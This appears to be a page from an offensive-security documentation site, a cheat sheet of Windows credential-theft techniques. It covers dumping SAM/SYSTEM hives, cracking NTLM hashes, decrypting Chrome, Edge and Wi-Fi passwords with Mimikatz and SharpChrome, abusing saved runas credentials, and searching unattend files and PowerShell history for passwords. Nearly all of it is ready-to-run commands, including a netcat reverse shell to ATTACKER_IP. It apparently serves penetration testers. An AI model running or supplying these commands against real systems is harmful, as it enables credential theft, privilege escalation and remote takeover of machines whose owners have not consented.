Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

SAM / SYSTEM Dump

SAM database contains local account NTLM hashes. Needs SYSTEM + SAM hives.

Copy Registry Hives

reg save HKLM\SAM C:\Windows\Temp\SAM
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM

Volume Shadow Copy (If Locked)

wmic shadowcopy call create Volume='C:\'

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\Temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM

Extract Hashes (Attacker)

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

samdump2 SYSTEM SAM

Crack NTLM Hashes

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

DPAPI — Saved Passwords

DPAPI protects Chrome/Edge passwords, Wi-Fi keys, RDP credentials.

Chrome/Edge Passwords

Encrypted DB location: 
C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\%USERNAME%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Decrypt with Mimikatz

dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Decrypt with SharpChrome

SharpChrome.exe logins

Wi-Fi Passwords via DPAPI

netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

Windows Vault / Credential Manager

List Stored Credentials

cmdkey /list

vaultcmd /listcreds:"Windows Credentials" /all

Exploit Saved Credentials (runas /savecred)

If cmdkey /list shows stored credentials: 
runas /savecred /user:DOMAIN\admin cmd.exe

runas /savecred /user:Administrator "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

Extract with Mimikatz

vault::cred /patch

Unattend.xml / Sysprep Files

Deployment files often contain plaintext or base64-encoded passwords.

Common Locations

dir /s /b C:\unattend.xml C:\Unattend.xml 2>nul
dir /s /b C:\sysprep.xml C:\sysprep.inf 2>nul

Get-ChildItem -Path C:\ -Recurse -Include unattend.xml,sysprep.xml,sysprep.inf,Unattended.xml -ErrorAction SilentlyContinue
Full list of paths: 
C:\unattend.xml
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\Unattend\unattend.xml
C:\Windows\System32\sysprep\unattend.xml
C:\Windows\System32\sysprep\sysprep.xml
C:\Windows\System32\sysprep.inf

Password Format in Unattend.xml

<AutoLogon>
  <Password>
    <Value>UABhAHMAcwB3AG8AcgBkADEAMgAzAA==</Value>
    <PlainText>false</PlainText>
  </Password>
  <Username>Administrator</Username>
</AutoLogon>

Decode Base64 Password

echo "UABhAHMAcwB3AG8AcgBkADEAMgAzAA==" | base64 -d

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("UABhAHMAcwB3AG8AcgBkADEAMgAzAA=="))

PowerShell History

History File Location

(Get-PSReadlineOption).HistorySavePath
Default: 
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Read History for All Users

Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Output "=== $($_.FullName) ==="; Get-Content $_ }

Search for Credentials

Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Select-String -Path $_ -Pattern "password|credential|secret|key|token|pass" -AllMatches }

CMD History

doskey /history